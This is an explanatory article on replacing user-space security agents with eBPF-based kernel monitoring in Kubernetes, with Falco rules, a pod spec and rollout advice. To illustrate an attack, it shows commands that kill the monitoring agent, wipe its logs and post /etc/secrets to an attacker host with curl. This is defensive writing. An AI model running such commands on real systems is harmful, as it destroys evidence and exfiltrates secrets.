Article: Kernel-Level Ground Truth: Why eBPF is Replacing User-Space Agents for Security Observability

This article argues that user-space security agents are structurally flawed because they share a privilege level with the processes they monitor, so an attacker with root access can simply kill the agent or erase its logs. It explains that eBPF solves this by attaching probes directly to the Linux kernel's syscall interface, providing visibility that a container-level attacker cannot disable. The piece also notes that replacing multiple user-space agents with a single eBPF-based solution can reduce security-related CPU consumption by 60-80% and that production-ready tools like Falco and Tetragon are available today.

Key Takeaways

- Application-level logging depends on the cooperation of the process being monitored. A compromised process can kill its own watchdog, rewrite logs, or simply skip generating them. Your security visibility should not hinge on an attacker's willingness to be observed.
- eBPF attaches probes directly to the Linux kernel's syscall interface, giving you visibility that persists even when an attacker has root inside a container. Disabling an eBPF probe requires escaping to the host kernel, which is a far harder problem than running kill -9.
- Replacing a stack of user-space security agents with a single eBPF-based agent can cut security-related CPU consumption by 60-80%, and the telemetry volume drops sharply because filtering happens in the kernel instead of in a SIEM you are paying per-GB for.
- Roll out eBPF security in phases: observe first, alert second, enforce last. Skipping straight to enforcement is how you get paged at 3 AM because a detection rule killed your payment service.
- Falco (CNCF graduated) and Tetragon (a Cilium sub-project) are production-ready today. You do not need to write kernel code to get started.

Introduction

Last year I was looking into a post-mortem from an incident where a container breakout went completely undetected in a production Kubernetes cluster. The security team pulled up dashboards, scrolled through logs, and found nothing useful. Turns out the attacker had killed the logging sidecar as a first move. Everything that happened after that was invisible.

The attack itself was not particularly clever. The monitoring stack just had a structural weakness baked in: the agent shared user space with the thing it was supposed to watch. Root in the container meant kill -9 on the agent, truncate on the log files, and then free rein. Fileless payloads via memfd_create never touched the filesystem. Process injection hid behind trusted PIDs. The logging layer was the softest target in the whole setup.

That write-up got me digging into eBPF seriously. Every process, malicious or not, has to cross the syscall boundary to open files, connect to the network, or spawn children. eBPF lets you instrument that boundary inside the kernel itself, where a container-level attacker simply cannot reach it.

This article covers the architecture behind eBPF-based security monitoring, how to roll it out without breaking production, the cost story at scale, and which tools are worth your time right now.

The Problem with User-Space Security Agents

Living at the Same Privilege Level as the Threat

Most Kubernetes security monitoring runs as sidecar containers or DaemonSets, basically user-space processes sitting alongside the workloads they watch.

Figure 1: Traditional sidecar-based security monitoring. The agent shares the same privilege boundary as the workloads it monitors. (Original diagram by the author)

This architecture has a fundamental issue: the security agent and the attacker operate at the same level. With root in the container, an attacker can:

    $ kill -9 $(pgrep security-agent)
    $ truncate -s 0 /var/log/agent/*.log
    $ curl http://attacker.com/exfil -d @/etc/secrets

No alert ever fires because the agent was dead before anything interesting happened.

The CPU Tax

User-space agents also impose real cost. To inspect network traffic, they proxy connections through themselves, which means every packet crosses the user-kernel boundary multiple times. Add log serialization, parsing, and transmission on top, and it is easy to lose a meaningful slice of cluster CPU to security overhead alone. I have seen clusters where the monitoring stack consumed more resources than several of the services it was protecting.

What Attackers Know

Capable adversaries specifically target these gaps. memfd_create lets code execute from memory without ever touching the filesystem, so file integrity monitors see nothing. Process injection hides behind trusted binaries the agent already ignores.
Log evasion exploits the window between malicious activity and log shipment to delete evidence. The monitoring layer is the first thing a skilled attacker takes out, and the current architecture makes that easy.

How eBPF Changes the Equation

The Short Version

eBPF lets you run sandboxed programs inside the Linux kernel without writing a kernel module. Originally a packet filtering mechanism (hence "Berkeley Packet Filter"), the modern extended version is a general-purpose kernel instrumentation framework. Three things matter for security:

- A built-in verifier statically analyzes every eBPF program at load time, checking that it cannot crash the kernel, access unauthorized memory, or loop forever. If verification fails, the program never runs. The check happens once at load time, so it adds no runtime cost, and a program that could panic the kernel is rejected before it executes.
- eBPF programs execute in kernel context with direct access to kernel data structures. No user-kernel context switches, no proxy overhead.
- You can attach probes to thousands of kernel functions, syscalls, network events, and tracepoints.

The Verifier Deserves Its Own Paragraph

Running custom code in the kernel makes people nervous, and with kernel modules that nervousness is justified. A buggy module can panic the machine. eBPF's verifier is designed to remove that failure mode. It walks every possible execution path through the bytecode and checks termination guarantees, memory bounds, function call restrictions, and stack depth (capped at 512 bytes). All statically, all before the program loads.

The verifier is strict on purpose. It will reject programs that are actually safe but too complex for it to prove correct. Anyone who has worked with eBPF has hit this. You end up restructuring perfectly valid code just to satisfy the verifier. But that conservatism is why Meta, Google, and Netflix run eBPF in their production kernels at massive scale.
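
To make that conservatism concrete, here is a toy model in Python. It is not how the kernel's verifier is implemented, and the instruction tuples and the toy_verify function are invented purely for illustration. It only mirrors the idea described above: check every instruction statically, refuse anything whose termination or stack bounds cannot be shown trivially, and accept that some safe programs will be rejected along the way.

```python
STACK_LIMIT = 512  # bytes; the stack cap mentioned in the text


def toy_verify(program):
    """Statically check a list of toy instructions. Returns (ok, reason).

    Hypothetical instruction set, for illustration only:
      ("store", offset)   write to the stack at a negative byte offset
      ("jump", target)    unconditional jump to an instruction index
      ("branch", target)  conditional jump: either falls through or jumps
      ("exit",)           end of program
    """
    for pc, insn in enumerate(program):
        op = insn[0]
        if op == "store":
            offset = insn[1]
            if not -STACK_LIMIT <= offset < 0:
                return False, f"insn {pc}: stack offset {offset} out of bounds"
        elif op in ("jump", "branch"):
            target = insn[1]
            if not 0 <= target < len(program):
                return False, f"insn {pc}: jump target {target} out of range"
            if target <= pc:
                # A backward jump could form a loop. The toy cannot prove
                # the loop is bounded, so it rejects it even if it is safe.
                return False, f"insn {pc}: backward jump to {target}"
        elif op != "exit":
            return False, f"insn {pc}: unknown opcode {op!r}"

    # With forward-only jumps every path moves strictly forward, so the
    # only remaining way to misbehave is to run past the last instruction.
    if not program or program[-1][0] != "exit":
        return False, "program can fall off the end without exit"
    return True, "ok"
```

A program such as [("store", -8), ("jump", 0), ("exit",)] is rejected for its backward jump without the checker ever running it. That is the same trade described above: certainty at load time, bought by refusing code the checker cannot reason about.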

Where the Probes Sit

For security, eBPF programs attach at the syscall interface, the boundary every process must cross for privileged operations.

Figure 2: eBPF probes sit at the syscall interface. Every process, including an attacker's, must cross this boundary. (Original diagram by the author)

When any process calls connect, execve, or open, the probe captures the syscall arguments, process/thread IDs, container ID, Kubernetes pod metadata, user ID, capabilities, and the parent process chain. Because the probe runs in kernel context, an attacker with root inside a container would need to escape to the host kernel to tamper with it. That is a completely different class of problem compared to killing a user-space process.

The Cost Story

Organizations that have replaced a multi-agent user-space security stack with a single eBPF-based agent report CPU reductions of 60-80% on security workloads (https://isovalent.com/blog/post/ebpf-security-observability/).

Figure 3: Overhead comparison between user-space security agents and eBPF kernel-level monitoring. (Original diagram by the author)

There is a data volume angle too. User-space agents ship every log line, connection event, and file access to a centralized platform where most of it gets thrown away after ingestion. With eBPF the filtering happens in the kernel, so only events that actually matter leave the node. The SIEM ingestion cost reduction varies, but for most workloads it is substantial.
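
The arithmetic behind the data volume point can be sketched in a few lines of Python. This is a user-space simulation of a decision that an eBPF program would make in the kernel, and everything in it is an assumption made for illustration: the event fields (syscall, container, size), the is_interesting filter, and any numbers you feed it. It says nothing about the reduction a real workload would see.

```python
def is_interesting(event):
    """Hypothetical filter: keep only process executions and outbound
    connections that come from a container. A real policy would be
    far more specific than this."""
    return (
        event["syscall"] in {"execve", "connect"}
        and event["container"] is not None
    )


def bytes_shipped(events, keep=lambda event: True):
    """Total bytes that leave the node for the events the filter keeps."""
    return sum(event["size"] for event in events if keep(event))


def reduction(events, keep):
    """Fraction of bytes that never leave the node when `keep` is applied
    at the source instead of after ingestion."""
    total = bytes_shipped(events)
    if total == 0:
        return 0.0
    return 1 - bytes_shipped(events, keep) / total
```

Calling reduction(events, is_interesting) on a sample of your own event stream gives a rough feel for how much of the SIEM bill is spent on data nobody reads. The result depends entirely on the filter and the workload.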

Kernel Compatibility

The features that matter for production security landed across kernels 4.1 through 5.7:

| Feature | Minimum Kernel | Description |
|---|---|---|
| Basic tracing | 4.1 | kprobes, uprobes |
| Syscall tracing | 4.6 | Tracepoint-based syscall monitoring |
| Container awareness | 4.15 | cgroup-based filtering |
| BTF type information | 5.2 | Portable eBPF programs |
| bpf_send_signal | 5.3 | Process termination from eBPF |
| LSM hooks | 5.7 | Security policy enforcement |

Most production Kubernetes distributions ship with 5.4+, so kernel support is rarely a blocker. Worth checking your specific nodes, but I have not run into a kernel version problem on any reasonably current distribution.

Rolling It Out Without Breaking Production

Do not skip straight to enforcement. That path leads to false positives killing production processes and a very awkward post-mortem.

Figure 4: Phased rollout: observe, alert, then enforce. Base progression on confidence, not calendar dates. (Original diagram by the author)

Phase 1: Watch and Learn

Deploy an eBPF agent (Falco or Tetragon) as a DaemonSet in passive mode. The agent observes all syscalls but blocks nothing. You need host-level access and kernel debug mounts:

    # Pod spec fragment; the matching volumes entries are omitted here.
    spec:
      hostPID: true
      hostNetwork: true
      containers:
        - name: agent
          image: falcosecurity/falco-no-driver:latest
          securityContext:
            privileged: true
          volumeMounts:
            - name: bpf-fs
              mountPath: /sys/fs/bpf
            - name: kernel-debug
              mountPath: /sys/kernel/debug
              readOnly: true

Falco's Helm chart (https://github.com/falcosecurity/charts) handles the full DaemonSet config. For a first deployment, start there.

During this phase, you are building baselines: which binaries each service runs, what network connections it establishes, what files it touches, what the normal process tree looks like. Stream events to cheap archival storage, not your real-time analytics platform. Move to the next phase once your baselines are stable across a few deployment cycles.
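
As a rough sketch of what "building a baseline" can mean in practice, the Python below reduces archived events to the set of binaries seen per container, then checks a later batch against that set. The event shape (dicts with container and proc keys) and both function names are assumptions made for this example. They are not Falco's or Tetragon's output format, so adapt the field access to whatever your agent actually emits.

```python
from collections import defaultdict


def build_baseline(events):
    """Map each container name to the set of process names observed in it."""
    baseline = defaultdict(set)
    for event in events:
        baseline[event["container"]].add(event["proc"])
    return dict(baseline)


def new_behaviour(baseline, events):
    """Return sorted (container, proc) pairs that the baseline has not seen.

    An empty result across a few deployment cycles is one signal that the
    baseline has stabilised.
    """
    unseen = {
        (event["container"], event["proc"])
        for event in events
        if event["proc"] not in baseline.get(event["container"], set())
    }
    return sorted(unseen)
```

Running new_behaviour after each deployment cycle and watching the result shrink toward an empty list is one simple way to decide when the baseline is stable enough to start writing alert rules against it. The same idea extends to network destinations and file paths.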

Phase 2: Alert on Anomalies

Now write detection rules against the baselines. This is behavioral detection, not signature matching. You are looking for deviations from what you know is normal. A Falco rule for unexpected process execution in a payment service:

    - rule: Unexpected Process in Payment Service
      desc: Detect execution of binaries not in the approved list
      condition: >
        spawned_process
        and container.name startswith "payment-"
        and not proc.name in (java, jcmd, jstat)
      output: >
        Unexpected process executed in payment container
        (user=%user.name container=%container.name
        process=%proc.name cmdline=%proc.cmdline parent=%proc.pname)
      priority: WARNING
      tags: [container, process, payment]

And one for metadata service access, which is almost always a sign of trouble:

    - rule: Container Accessing Cloud Metadata Service
      desc: Detect attempts to access instance metadata
      condition: >
        outbound
        and fd.sip = "169.254.169.254"
        and container.id != host
      output: >
        Container attempted metadata service access
        (container=%container.name pod=%k8s.pod.name
        namespace=%k8s.ns.name dest=%fd.sip)
      priority: CRITICAL
      tags: [network, cloud, metadata]

Spend real time tuning during this phase. Review every alert, understand the false positives, suppress the known-good patterns. Move to enforcement only once the alert volume is manageable and you have validated rules against known attack scenarios.

Phase 3: Enforce

With high confidence in your detection rules, enable active blocking. Tetragon can use bpf_send_signal to SIGKILL a process before the offending syscall completes. Response time is measured in microseconds, not the minutes or hours of a traditional IR workflow.

A typical enforcement scenario: a container calls connect to 169.254.169.254, the eBPF probe intercepts it, policy evaluation flags a violation, SIGKILL fires, the syscall never completes, and the alert goes out. The metadata service was never reached.

This phase demands discipline.
A false positive that kills a legitimate process is a production outage. The observation and alerting phases exist specifically to build enough confidence that enforcement does not become a liability.

Tooling: Falco, Tetragon, and the Vendors

Falco (https://falco.org/) is where I would start for most teams. It is a CNCF graduated project with a big community, active development, and years of production mileage. It hooks into the syscall interface via eBPF and evaluates events against a YAML-based rule engine. The default ruleset maps to MITRE ATT&CK and covers reverse shells, container escapes, sensitive path access, and more.

What I find most valuable about Falco is the Kubernetes context it attaches to events. The difference between "process X called connect to 169.254.169.254" and "the payment-api pod in the prod namespace tried to reach the cloud metadata service" is the difference between fifteen minutes of cross-referencing and an immediately actionable alert.

For active enforcement, where you need to kill a process before a malicious syscall completes, look at Tetragon (https://tetragon.io/). It is a Cilium sub-project and applies policy synchronously in the kernel. The trade-off is a smaller community and tighter coupling to the Cilium stack.

Commercial vendors like Sysdig, Datadog, and Wiz have also rebuilt their agents on eBPF. If you already use one of them, check what eBPF capabilities you have before adding another tool.

Securing the eBPF Deployment Itself

eBPF programs run in the kernel with elevated privileges, so do not hand-wave the deployment security. Loading programs requires CAP_BPF (or CAP_SYS_ADMIN on kernels before 5.8). Start with a privileged container if you must, then tighten to the minimum capabilities, usually CAP_BPF, CAP_PERFMON, and CAP_SYS_RESOURCE.
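
One way to confirm that the tightening actually took effect is to read the effective capability mask from inside the agent container. The sketch below decodes the CapEff line of /proc/self/status. The bit positions are the ones defined in the Linux capability header, but the helper names decode_caps and effective_caps are made up for this example, and the table deliberately lists only the four capabilities discussed here.

```python
# Bit positions from the Linux capability definitions. Only the four
# capabilities discussed in this section are listed.
CAP_BITS = {
    "CAP_SYS_ADMIN": 21,
    "CAP_SYS_RESOURCE": 24,
    "CAP_PERFMON": 38,
    "CAP_BPF": 39,
}


def decode_caps(cap_hex):
    """Turn a hex capability mask (as shown in CapEff) into capability names."""
    mask = int(cap_hex, 16)
    return {name for name, bit in CAP_BITS.items() if mask & (1 << bit)}


def effective_caps(status_path="/proc/self/status"):
    """Read the effective capability mask of the current process (Linux only)."""
    with open(status_path) as status:
        for line in status:
            if line.startswith("CapEff:"):
                return decode_caps(line.split()[1])
    return set()
```

If effective_caps() still reports CAP_SYS_ADMIN after you have switched from privileged mode to an explicit capability list, the securityContext change has not taken effect.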

Beyond that:

- Lock down which service accounts can deploy elevated-capability containers
- Use admission controllers (OPA Gatekeeper, Kyverno) to confine privileged workloads to the security namespace
- Monitor that namespace for unauthorized changes
- Pin agent images to verified digests, not mutable tags

The verifier handles bytecode safety. Operational safety is on you.

Conclusion

Application-level logging is not going away. You still need it for debugging business logic and tracing requests through service meshes. But for security, where the adversary's first move is to disable your instrumentation, you need monitoring at a layer they cannot easily reach.

eBPF gives you that. Syscall-level visibility that persists regardless of what the application does, instrumentation that lives in the kernel where container-level compromise cannot touch it, and overhead that is a fraction of what user-space agents impose.

If you want to see it for yourself: deploy Falco on a staging cluster in observation-only mode. Spend thirty minutes looking at the events it captures. The gap between what your current monitoring shows and what eBPF reveals at the syscall level will make the case better than anything I can write here.

And if you are already running eBPF-based security in production, share what you have learned. There is not nearly enough real-world operational knowledge circulating in this space.